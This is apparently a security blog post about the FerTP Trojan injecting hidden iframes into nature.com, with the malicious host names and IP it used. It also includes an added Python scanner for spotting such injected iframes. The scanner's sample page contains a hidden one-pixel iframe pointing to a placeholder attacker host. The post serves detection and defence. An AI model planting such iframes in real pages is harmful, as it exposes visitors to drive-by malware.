Nature.com and the Weakest Link
Recently, ScanSafe STAT investigated blocks on the nature.com website. Nature is an internationally recognized journal of research articles pertaining to science and medicine. It turns out Nature may also be a victim of the FerTP Trojan, which scans infected machines looking for FTP login credentials, then uses those credentials to log onto any websites it finds and append a malicious iframe to the default loading pages. That iframe loads exploit code from a path on the money2008.org domain, hosted in Israel. The exploit code attempts to download malware from 89.149.253.17, hosted in Germany. Of course, just because a site is hosted in a particular country, that doesn't mean the attackers are from that country. The web creates an international playing field, and the actual attackers could be anywhere.
The malware contained on 89.149.253.17 is a DNS changer, which can then forcibly (and surreptitiously) redirect the user to sites other than the ones they expected. And because the DNS changer can resolve any domain to any IP, the effect would be seamless - and serious. For example, an infected user who typed in the URL for their bank's website could have it resolved to an IP not owned by the bank. That IP could (and likely would) host a look-alike site for the legitimate bank and steal the user's account credentials when they attempted to log in.
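The injection step above (an iframe appended to a site's landing pages, pointing off-site and typically sized or styled to be invisible) is something a site owner can check for on their own pages. The following is an added example, not code from the original post or from ScanSafe; it walks a page's HTML, collects every iframe, and flags the ones that match the pattern described: an off-site `src`, one-pixel or zero dimensions, CSS hiding, or placement after the closing `</html>` tag where appended content usually lands. The first-party domain set and the sample pages are constructed for the example, and `attacker.example` is a placeholder standing in for the exploit host the post names.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party hostnames for the site being checked (hypothetical value).
FIRST_PARTY = {"nature.com", "www.nature.com"}


class IframeCollector(HTMLParser):
    """Collect every <iframe> on a page and note whether it appears after </html>."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.after_html_close = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            a = dict(attrs)
            self.iframes.append({
                "src": a.get("src") or "",
                "width": a.get("width"),
                "height": a.get("height"),
                "style": a.get("style") or "",
                "after_html_close": self.after_html_close,
            })

    def handle_endtag(self, tag):
        # Anything parsed after </html> was most likely appended to the file.
        if tag == "html":
            self.after_html_close = True


def is_suspicious(frame, first_party):
    """Return the list of reasons an iframe looks injected (empty list if none)."""
    reasons = []
    host = urlparse(frame["src"]).hostname or ""
    if host and host not in first_party and not any(
        host.endswith("." + d) for d in first_party
    ):
        reasons.append("off-site src " + host)
    if any(d in ("0", "1") for d in (frame["width"], frame["height"]) if d is not None):
        reasons.append("zero/one-pixel dimensions")
    if re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", frame["style"], re.I):
        reasons.append("hidden via CSS")
    if frame["after_html_close"]:
        reasons.append("appended after </html>")
    return reasons


def scan_html(html, first_party=FIRST_PARTY):
    """Return [(src, reasons)] for each iframe that trips at least one check."""
    parser = IframeCollector()
    parser.feed(html)
    return [(f["src"], r) for f in parser.iframes if (r := is_suspicious(f, first_party))]


# Constructed sample pages for the example.
CLEAN_PAGE = """<html><head><title>Home</title></head>
<body><iframe src="https://video.nature.com/player"></iframe></body></html>
"""

INJECTED_PAGE = CLEAN_PAGE + (
    '<iframe src="http://attacker.example/path/" width="1" height="1" '
    'style="display:none"></iframe>\n'
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        for src, reasons in scan_html(page):
            print(f"{name}: {src} -> {', '.join(reasons)}")
```

Run this against a copy of the site's landing pages pulled straight from the web server (not a cached copy), since the Trojan edits files in place over FTP. Legitimate pages do sometimes carry small or hidden iframes for analytics, so treat a single reason as a triage hint and several reasons together, especially content after `</html>`, as a strong signal.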
There's an old saying in the industry that you are only as secure as your weakest link. In this case, presumably, that weakest link was a workstation somewhere within Nature Publishing Group. And because of their considerable web presence, that single Trojan infection was able to impact an untold number of users who might have visited nature.com over the past couple of days. Within Wikipedia, nature.com is one of the top 500 linked sites (#333 according to Newswriter). And according to Quantcast, Nature.com is "a top 5,000 site that reaches over 877K U.S. monthly uniques". That works out to about 29.3k unique visitors each day who risked exposure during the compromise (which fortunately has since been remedied).
Who's your weakest link?